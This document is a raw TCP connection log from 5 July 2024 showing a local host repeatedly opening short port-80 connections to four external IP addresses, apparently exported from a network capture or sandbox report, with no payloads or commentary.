                                  Jul 5, 2024 08:02:42.573580027 CEST4984880192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:42.578397989 CEST804984844.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:43.083165884 CEST804984844.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:43.083189964 CEST804984844.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:43.083221912 CEST4984880192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:43.083278894 CEST4984880192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:43.090224028 CEST4984880192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:43.095053911 CEST804984844.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:43.115482092 CEST4984480192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:43.115864038 CEST4984980192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:43.120877028 CEST804984978.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:43.121885061 CEST4984980192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:43.122011900 CEST4984980192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:43.122560024 CEST804984478.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:43.125612974 CEST4984480192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:43.127773046 CEST804984978.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:43.791151047 CEST804984978.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:43.791210890 CEST4984980192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:43.824122906 CEST4984580192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:43.824569941 CEST4985080192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:43.833157063 CEST804984537.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:43.833273888 CEST4984580192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:43.833656073 CEST804985037.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:43.833728075 CEST4985080192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:43.840428114 CEST4985080192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:43.849263906 CEST804985037.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:44.564938068 CEST804985037.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:44.566029072 CEST4985080192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:44.798443079 CEST4985080192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:44.798948050 CEST4985180192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:44.803831100 CEST804985137.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:44.803966045 CEST4985180192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:44.804085970 CEST804985037.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:44.804184914 CEST4985080192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:44.819983006 CEST4985180192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:44.825325012 CEST804985137.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:45.542001009 CEST804985137.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:45.543649912 CEST4985180192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:45.681282043 CEST4985280192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:45.686109066 CEST804985254.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:45.687623024 CEST4985280192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:45.687757015 CEST4985280192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:45.692476988 CEST804985254.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:46.418057919 CEST804985254.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:46.418076992 CEST804985254.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:46.418168068 CEST4985280192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:46.418168068 CEST4985280192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:46.423846960 CEST4985280192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:46.428648949 CEST804985254.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:46.463392019 CEST4985380192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:46.468390942 CEST804985344.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:46.468465090 CEST4985380192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:46.468982935 CEST4985380192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:46.473813057 CEST804985344.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:46.957115889 CEST804985344.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:46.957129955 CEST804985344.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:46.957173109 CEST4985380192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:46.957237005 CEST4985380192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:47.137828112 CEST4985380192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:47.143127918 CEST804985344.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:47.217814922 CEST4985480192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:47.222726107 CEST804985444.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:47.223454952 CEST4985480192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:47.224287987 CEST4985480192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:47.229235888 CEST804985444.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:47.722543001 CEST804985444.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:47.722558022 CEST804985444.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:47.722624063 CEST4985480192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:47.723196983 CEST4985480192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:47.724706888 CEST4984980192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:47.724994898 CEST4985580192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:47.728936911 CEST804985444.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:47.729787111 CEST804985578.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:47.729860067 CEST4985580192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:47.729993105 CEST804984978.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:47.730035067 CEST4984980192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:47.730063915 CEST4985580192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:47.734801054 CEST804985578.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:48.456147909 CEST804985578.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:48.456198931 CEST4985580192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:48.508024931 CEST4985180192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:48.508307934 CEST4985680192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:48.513206005 CEST804985137.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:48.513276100 CEST4985180192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:48.514018059 CEST804985637.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:48.514076948 CEST4985680192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:48.516870975 CEST4985680192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:48.521847963 CEST804985637.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:49.223248005 CEST804985637.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:49.223378897 CEST4985680192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:49.232877970 CEST4985680192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:49.233963013 CEST4985780192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:49.238217115 CEST804985637.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:49.238790989 CEST804985737.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:49.238845110 CEST4985680192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:49.238873005 CEST4985780192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:49.239028931 CEST4985780192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:49.244611979 CEST804985737.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:49.950459957 CEST804985737.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:49.950525045 CEST4985780192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:50.242714882 CEST4985880192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:50.247580051 CEST804985854.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:50.247648001 CEST4985880192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:50.247950077 CEST4985880192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:50.252710104 CEST804985854.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:50.939574957 CEST4985780192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:50.939620972 CEST4985580192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:50.945065022 CEST804985737.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:50.945118904 CEST4985780192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:50.945612907 CEST804985578.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:50.945655107 CEST4985580192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:50.976366043 CEST804985854.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:50.976465940 CEST804985854.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:50.976563931 CEST4985880192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:51.005568981 CEST4985880192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:51.010699034 CEST804985854.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:51.040826082 CEST4985980192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:51.047260046 CEST804985944.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:51.047341108 CEST4985980192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:51.047559977 CEST4985980192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:51.052566051 CEST804985944.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:51.542800903 CEST804985944.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:51.542833090 CEST804985944.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:51.542943001 CEST4985980192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:51.568262100 CEST4985980192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:51.573807001 CEST804985944.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:51.804111958 CEST4986080192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:51.809097052 CEST804986044.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:51.809180021 CEST4986080192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:51.809340954 CEST4986080192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:51.814075947 CEST804986044.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:52.336535931 CEST804986044.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:52.336555004 CEST804986044.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:52.336618900 CEST4986080192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:52.337924004 CEST4986080192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:52.343108892 CEST804986044.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:52.357469082 CEST4986180192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:52.362394094 CEST804986178.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:52.362535000 CEST4986180192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:52.362721920 CEST4986180192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:52.367602110 CEST804986178.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:53.017049074 CEST804986178.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:53.017107010 CEST4986180192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:53.157880068 CEST4986280192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:53.163754940 CEST804986237.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:53.165801048 CEST4986280192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:53.166032076 CEST4986280192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:53.170811892 CEST804986237.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:53.882483006 CEST804986237.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:53.883625031 CEST4986280192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:53.887893915 CEST4986280192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:53.888603926 CEST4986380192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:53.893290043 CEST804986237.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:53.893547058 CEST804986337.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:53.893847942 CEST4986280192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:53.893884897 CEST4986380192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:53.894651890 CEST4986380192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:53.899533987 CEST804986337.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:54.606465101 CEST804986337.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:54.607928038 CEST4986380192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:54.745764017 CEST4986480192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:54.750974894 CEST804986454.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:54.752150059 CEST4986480192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:54.752861977 CEST4986480192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:54.757786989 CEST804986454.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:55.473274946 CEST804986454.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:55.473293066 CEST804986454.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:55.473397017 CEST4986480192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:55.474383116 CEST4986480192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:55.476941109 CEST4986580192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:55.479151011 CEST804986454.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:55.482605934 CEST804986544.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:55.485686064 CEST4986580192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:55.485807896 CEST4986580192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:55.491249084 CEST804986544.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:56.005408049 CEST804986544.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:56.005506039 CEST4986580192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:56.006500959 CEST804986544.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:56.006616116 CEST4986580192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:56.017394066 CEST4986580192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:56.022543907 CEST804986544.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:56.127744913 CEST4986680192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:56.133085012 CEST804986644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:56.135657072 CEST4986680192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:56.135963917 CEST4986680192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:56.141027927 CEST804986644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:56.633768082 CEST804986644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:56.633841991 CEST804986644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:56.633996010 CEST4986680192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:56.634586096 CEST4986680192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:56.636459112 CEST4986180192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:56.636761904 CEST4986780192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:56.642427921 CEST804986644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:56.644956112 CEST804986178.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:56.645342112 CEST804986778.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:56.645395994 CEST4986180192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:56.645421982 CEST4986780192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:56.645637989 CEST4986780192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:56.651710033 CEST804986778.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:57.293364048 CEST804986778.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:57.293628931 CEST4986780192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:57.867558956 CEST4986380192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:57.867881060 CEST4986880192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:57.873250961 CEST804986837.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:57.873318911 CEST4986880192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:57.873404026 CEST804986337.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:57.873456001 CEST4986380192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:57.875725031 CEST4986880192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:57.880490065 CEST804986837.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:58.604192019 CEST804986837.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:58.604247093 CEST4986880192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:58.605566025 CEST4986880192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:58.605875969 CEST4986980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:58.610780954 CEST804986937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:58.611079931 CEST804986837.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:58.611152887 CEST4986880192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:58.611399889 CEST4986980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:58.611399889 CEST4986980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:58.616204977 CEST804986937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:59.342358112 CEST804986937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:59.342417002 CEST4986980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:59.481255054 CEST4987080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:59.486138105 CEST804987054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:59.487653017 CEST4987080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:59.487756014 CEST4987080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:59.493263960 CEST804987054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:03:00.227148056 CEST804987054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:03:00.227169991 CEST804987054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:03:00.227210045 CEST4987080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:03:00.227283001 CEST4987080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:03:00.242058039 CEST4987080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:03:00.248596907 CEST804987054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:03:00.269364119 CEST4987180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:03:00.274760962 CEST804987144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:03:00.274827957 CEST4987180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:03:00.275362968 CEST4987180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:03:00.280292034 CEST804987144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:03:00.783807993 CEST804987144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:03:00.783828974 CEST804987144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:03:00.783866882 CEST4987180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:03:00.783915043 CEST4987180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:03:00.785032034 CEST4987180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:03:00.790728092 CEST804987144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:03:00.793510914 CEST4987280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:03:00.799799919 CEST804987244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:03:00.799875975 CEST4987280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:03:00.800338984 CEST4987280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:03:00.806227922 CEST804987244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:03:01.293428898 CEST804987244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:03:01.293469906 CEST804987244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:03:01.293483973 CEST4987280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:03:01.293559074 CEST4987280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:03:01.315598965 CEST4987280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:03:01.320611000 CEST804987244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:03:01.325222015 CEST4986780192.168.2.978.46.2.155
                                  Jul 5, 2024 08:03:01.325428963 CEST4987380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:03:01.330720901 CEST804986778.46.2.155192.168.2.9
                                  Jul 5, 2024 08:03:01.330832005 CEST4986780192.168.2.978.46.2.155
                                  Jul 5, 2024 08:03:01.331141949 CEST804987378.46.2.155192.168.2.9
                                  Jul 5, 2024 08:03:01.331334114 CEST4987380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:03:01.331912041 CEST4987380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:03:01.336702108 CEST804987378.46.2.155192.168.2.9
                                  Jul 5, 2024 08:03:02.005183935 CEST804987378.46.2.155192.168.2.9
                                  Jul 5, 2024 08:03:02.005435944 CEST4987380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:03:02.045670033 CEST4986980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:02.045674086 CEST4987480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:02.050578117 CEST804987437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:03:02.050868034 CEST804986937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:03:02.051685095 CEST4986980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:02.051687956 CEST4987480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:02.055632114 CEST4987480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:02.060448885 CEST804987437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:03:02.979378939 CEST804987437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:03:02.979438066 CEST4987480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:02.983398914 CEST4987480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:02.984074116 CEST4987580192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:02.988512993 CEST804987437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:03:02.988563061 CEST4987480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:02.988873005 CEST804987537.230.104.89192.168.2.9
                                  Jul 5, 2024 08:03:02.989032030 CEST4987580192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:02.989234924 CEST4987580192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:02.994060040 CEST804987537.230.104.89192.168.2.9
                                  Jul 5, 2024 08:03:03.947719097 CEST804987537.230.104.89192.168.2.9
                                  Jul 5, 2024 08:03:03.947801113 CEST4987580192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:03.947910070 CEST804987537.230.104.89192.168.2.9
                                  Jul 5, 2024 08:03:03.947958946 CEST4987580192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:04.102379084 CEST4987680192.168.2.954.244.188.177
                                  Jul 5, 2024 08:03:04.107418060 CEST804987654.244.188.177192.168.2.9
                                  Jul 5, 2024 08:03:04.107501030 CEST4987680192.168.2.954.244.188.177
                                  Jul 5, 2024 08:03:04.108659029 CEST4987680192.168.2.954.244.188.177
                                  Jul 5, 2024 08:03:04.113461018 CEST804987654.244.188.177192.168.2.9
                                  Jul 5, 2024 08:03:04.861665964 CEST804987654.244.188.177192.168.2.9
                                  Jul 5, 2024 08:03:04.861682892 CEST804987654.244.188.177192.168.2.9
                                  Jul 5, 2024 08:03:04.861735106 CEST4987680192.168.2.954.244.188.177
                                  Jul 5, 2024 08:03:04.865834951 CEST4987680192.168.2.954.244.188.177
                                  Jul 5, 2024 08:03:04.870589018 CEST804987654.244.188.177192.168.2.9
                                  Jul 5, 2024 08:03:04.878144026 CEST4987780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:03:04.882982016 CEST804987744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:03:04.883146048 CEST4987780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:03:04.888641119 CEST4987780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:03:04.893500090 CEST804987744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:03:05.391891003 CEST804987744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:03:05.391911983 CEST804987744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:03:05.392015934 CEST4987780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:03:05.463392973 CEST4987780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:03:05.470032930 CEST804987744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:03:05.545406103 CEST4987880192.168.2.944.221.84.105
                                  Jul 5, 2024 08:03:05.550615072 CEST804987844.221.84.105192.168.2.9
                                  Jul 5, 2024 08:03:05.550812006 CEST4987880192.168.2.944.221.84.105
                                  Jul 5, 2024 08:03:05.551264048 CEST4987880192.168.2.944.221.84.105
                                  Jul 5, 2024 08:03:05.556119919 CEST804987844.221.84.105192.168.2.9
                                  Jul 5, 2024 08:03:06.059880972 CEST804987844.221.84.105192.168.2.9
                                  Jul 5, 2024 08:03:06.059902906 CEST804987844.221.84.105192.168.2.9
                                  Jul 5, 2024 08:03:06.059973955 CEST4987880192.168.2.944.221.84.105
                                  Jul 5, 2024 08:03:06.060914993 CEST4987880192.168.2.944.221.84.105
                                  Jul 5, 2024 08:03:06.064299107 CEST4987380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:03:06.064765930 CEST4987980192.168.2.978.46.2.155
                                  Jul 5, 2024 08:03:06.065659046 CEST804987844.221.84.105192.168.2.9
                                  Jul 5, 2024 08:03:06.069591999 CEST804987978.46.2.155192.168.2.9
                                  Jul 5, 2024 08:03:06.069605112 CEST804987378.46.2.155192.168.2.9
                                  Jul 5, 2024 08:03:06.069669008 CEST4987980192.168.2.978.46.2.155
                                  Jul 5, 2024 08:03:06.069701910 CEST4987380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:03:06.072073936 CEST4987980192.168.2.978.46.2.155
                                  Jul 5, 2024 08:03:06.077143908 CEST804987978.46.2.155192.168.2.9
                                  Jul 5, 2024 08:03:06.726538897 CEST804987978.46.2.155192.168.2.9
                                  Jul 5, 2024 08:03:06.726613998 CEST4987980192.168.2.978.46.2.155
                                  Jul 5, 2024 08:03:06.768749952 CEST4987580192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:06.769191980 CEST4988080192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:06.774110079 CEST804987537.230.104.89192.168.2.9
                                  Jul 5, 2024 08:03:06.774244070 CEST4987580192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:06.775114059 CEST804988037.230.104.89192.168.2.9
                                  Jul 5, 2024 08:03:06.775224924 CEST4988080192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:06.776659012 CEST4988080192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:06.781574965 CEST804988037.230.104.89192.168.2.9
                                  Jul 5, 2024 08:03:07.487838030 CEST804988037.230.104.89192.168.2.9
                                  Jul 5, 2024 08:03:07.487896919 CEST4988080192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:07.522799015 CEST4988080192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:07.523557901 CEST4988180192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:07.528099060 CEST804988037.230.104.89192.168.2.9
                                  Jul 5, 2024 08:03:07.528278112 CEST4988080192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:07.528455973 CEST804988137.230.104.89192.168.2.9
                                  Jul 5, 2024 08:03:07.528508902 CEST4988180192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:07.529920101 CEST4988180192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:07.534770966 CEST804988137.230.104.89192.168.2.9
                                  Jul 5, 2024 08:03:08.298130989 CEST804988137.230.104.89192.168.2.9
                                  Jul 5, 2024 08:03:08.298582077 CEST4988180192.168.2.937.230.104.89
                                  Jul 5, 2024 08:03:08.427309036 CEST4988280192.168.2.954.244.188.177
                                  Jul 5, 2024 08:03:08.433353901 CEST804988254.244.188.177192.168.2.9
